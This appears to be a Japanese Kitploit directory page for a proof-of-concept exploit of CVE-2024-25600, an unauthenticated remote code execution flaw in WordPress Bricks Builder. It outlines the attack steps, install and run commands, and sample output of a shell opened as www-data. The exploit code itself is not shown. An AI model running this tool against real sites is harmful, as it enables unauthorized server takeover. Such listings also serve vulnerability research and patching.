Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC — WordPress Bricks Builder <= 1.9.6 における認証なしリモートコード実行の脆弱性。テンプレートレンダリングエンドポイントは認証なしでPHPコードを受け入れるため、ウェブサーバーユーザーとして任意のコマンド実行が可能になります。 | Kitploit
ツール/GitHubGitHub/estebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubestebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc

CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC

WordPress Bricks Builder <= 1.9.6 における認証なしリモートコード実行の脆弱性。テンプレートレンダリングエンドポイントは認証なしでPHPコードを受け入れるため、ウェブサーバーユーザーとして任意のコマンド実行が可能になります。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
16ヶ月前未レビュー

CVE-2024-25600 — WordPress Bricks Builder RCE (PoC)

WordPress Bricks Builder <= 1.9.6 には、未認証のリモートコード実行の脆弱性があります。テンプレートレンダリングエンドポイントは認証なしで PHP コードを受け入れるため、Web サーバーユーザーとして任意のコマンドを実行できます。


動作の仕組み

  1. ターゲットのページソースから Bricks nonce を取得します(エンドポイントとやり取りするために必要)。
  2. ターゲットが脆弱であることを確認するためにテストペイロードを送信します。
  3. レンダリングエンドポイントを介してコマンドを注入することで、対話型シェルを開きます。

要件

  • Python 3
  • 依存関係をインストール:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

使い方

root@kitploit:~
python3 exploit.py -u http://TARGET

例:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

参照

  • CVE-2024-25600
  • Bricks Builder セキュリティアドバイザリ
  • Wordfence の解説記事

クレジット

  • 発見者: Snicco / Calvin Alkan
  • オリジナルエクスプロイト: K3ysTr0K3R
  • クリーンアップ & 簡略化: Esteban Zárate
ツールをダウンロード